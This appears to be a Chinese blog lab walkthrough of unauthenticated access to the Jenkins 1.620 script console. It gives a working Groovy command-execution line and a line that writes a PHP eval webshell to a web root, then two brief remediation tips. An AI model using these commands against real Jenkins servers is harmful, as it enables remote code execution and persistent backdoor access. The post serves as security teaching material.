Jenkins 未授权访问

Jenkins是一个开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，旨在提供一个开放易用的软件平台，使软件的持续集成变成可能。

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

jenkins-1.620

1、官方下载jenkins-1.620.zip,下载地址:http://mirrors.jenkins.io/windows/jenkins-1.620.zip

2、运行setup.exe，安装即可，安装成功后在任务管理器中运行jenkins服务，默认安装完就启动了。

3、访问http://localhost:8080即可

1、浏览器访问http://192.168.150.128:8080/manage ,可以看到没有做任何限制,可以直接访问

2、点击”脚本命令行”

3、执行系统命令,下图看到成功执行系统命令

println "whoami".execute().text

4、利用”脚本命令行”上传webshell,内容如下:

new File("D:\\phpstudy\\WWW\\shell.php").write('<?php @eval($_POST[cmd]);?>');
这里写入绝对路径即可，然后即可连接

1、对后台控制页面做登录验证限制

2、升级更高的版本

请尊重作者原创，转载复制请标明出处(●'◡'●) 免责声明：该博客中所发表的文章仅用作学习交流使用，任何人不得用来做违法犯罪活动，出现问题均与本人无关。

发表回复 取消回复